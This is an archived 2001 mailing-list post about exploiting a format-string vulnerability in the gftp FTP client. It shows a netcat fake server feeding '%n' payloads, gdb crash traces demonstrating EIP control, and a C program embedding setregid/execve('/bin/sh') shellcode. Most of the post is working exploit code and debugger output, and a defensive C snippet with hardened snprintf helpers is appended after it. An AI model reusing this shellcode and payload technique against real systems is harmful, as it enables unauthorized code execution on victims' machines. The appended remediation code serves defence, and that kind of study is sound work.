Here are some of the other ways of playing with gftp that the SRTeam of snosoft.com have been playing with.
http://www.snosoft.com/SRTeam/srteam.html

-Krfinisterre

-------- Original Message --------
Subject: heres how to exploit gftp
Date: Sat, 21 Apr 2001 19:20:22 +0000
From: KRF <dotslashat_private>
Reply-To: krfinisterreat_private
To: reconat_private

here are some ideas... data can u help out...

(root)>./execve
shellcode addy: 0xbffff848
ctrl C
(root)>echo -e "\x48\xf8\xff\xbf"
Høÿ¿

%n writes data to current frame, see example...

(root)>echo -e "AAAA%n" > file
(root)>nc -l -p 21 < file

Program received signal SIGSEGV, Segmentation fault.
0x40325dd7 in vfprintf () from /lib/libc.so.6
(gdb) bt
#0  0x40325dd7 in vfprintf () from /lib/libc.so.6
#1  0x40332bbc in vsprintf () from /lib/libc.so.6
#2  0x401ae8d2 in g_strdup_vprintf () from /usr/lib/libglib-1.2.so.0
#3  0x8111248 in ?? ()
Cannot access memory at address 0x41414141

sooooooooo knowing that we control the eip, let's try to point it at some shellcode.

(root)>echo -e "\x48\xf8\xff\xbf%n" > file
(root)>nc -l -p 21 < file
(gdb) run ftp://localhost
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/bin/gftp ftp://localhost
warning: Unable to find dynamic linker breakpoint function.

Program received signal SIG32, Real-time event 32.
0x4030617e in sigsuspend () from /lib/libc.so.6
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x40325dd7 in vfprintf () from /lib/libc.so.6
(gdb) bt
#0  0x40325dd7 in vfprintf () from /lib/libc.so.6
#1  0x40332bbc in vsprintf () from /lib/libc.so.6
#2  0x401ae8d2 in g_strdup_vprintf () from /usr/lib/libglib-1.2.so.0
#3  0x403c8010 in __morecore () from /lib/libc.so.6
#4  0x80beaf8 in ?? ()
#5  0xbffffa31 in ?? ()
#6  0x6e69622f in ?? ()
Cannot access memory at address 0x7273752f
(gdb) Quit

I have no idea where I ended up, perhaps you can help?? this is definitely not the proper approach to this...
(root)>cat > execve.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    char hell[] =
        /* main: */
        /* setregid(12, 12); */
        "\x29\xc0"                      /* subl %eax, %eax */
        "\xb0\x47"                      /* movb $71, %al */
        "\x29\xdb"                      /* subl %ebx, %ebx */
        "\xb3\x0c"                      /* movb $12, %bl */
        "\x89\xd9"                      /* movl %ebx, %ecx */
        "\xcd\x80"                      /* int $0x80 */
        "\xeb\x18"                      /* jmp callz */
        "\x5e"                          /* popl %esi */
        "\x29\xc0"                      /* subl %eax, %eax */
        "\x88\x46\x07"                  /* movb %al, 0x07(%esi) */
        "\x89\x46\x0c"                  /* movl %eax, 0x0c(%esi) */
        "\x89\x76\x08"                  /* movl %esi, 0x08(%esi) */
        "\xb0\x0b"                      /* movb $0x0b, %al */
        "\x87\xf3"                      /* xchgl %esi, %ebx */
        "\x8d\x4b\x08"                  /* leal 0x08(%ebx), %ecx */
        "\x8d\x53\x0c"                  /* leal 0x0c(%ebx), %edx */
        "\xcd\x80"                      /* int $0x80 */
        "\xe8\xe3\xff\xff\xff"          /* call start */
        "\x2f\x62\x69\x6e\x2f\x73\x68"; /* "/bin/sh" */

    /* print where the buffer sits so the address can be reused from the shell */
    printf("shellcode addy: %p\n", (void *) hell);
    execl("/usr/bin/gftp", "gftp", "ftp://localhost", (char *) 0);
    exit(0);
}
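The crash in the backtraces above comes from server-supplied text reaching vfprintf() (via g_strdup_vprintf) as the format argument, which is why a "%n" in a reply turns into a memory write. The following is an added example, not code from the original post or from gftp, showing the hardened call pattern plus two defence-in-depth helpers with hypothetical names (format_server_message, count_format_directives, escape_percent):

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helpers, not gftp's code. The root cause on this page is text
 * received from the FTP server being passed to a printf-family function as
 * the FORMAT argument; a "%n" in a server reply then writes into memory. */

/* Vulnerable pattern (never do this): snprintf(out, outsz, server_text);
 * Hardened form: the untrusted text is only ever a "%s" argument, so any
 * '%' it contains is printed literally instead of being interpreted. */
int format_server_message(char *out, size_t outsz, const char *server_text)
{
    return snprintf(out, outsz, "Server said: %s", server_text);
}

/* Defence in depth: count conversion directives in data that must never be
 * used as a format. "%%" is a literal percent sign, not a directive. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* escaped percent: skip both characters */
            s++;
            continue;
        }
        n++;                    /* "%n", "%x", or a dangling '%' at the end */
    }
    return n;
}

/* Neutralise a string for a code path that wrongly treats it as a format:
 * every '%' becomes "%%". Returns characters written (excluding the NUL),
 * or -1 if out is too small to hold the escaped result. */
int escape_percent(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    for (; *in; in++) {
        size_t need = (*in == '%') ? 2 : 1;
        if (o + need >= outsz)  /* keep room for the terminating NUL */
            return -1;
        out[o++] = *in;
        if (*in == '%')
            out[o++] = '%';
    }
    out[o] = '\0';
    return (int) o;
}
```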
This archive was generated by hypermail 2b30 : Sat Apr 28 2001 - 10:23:00 PDT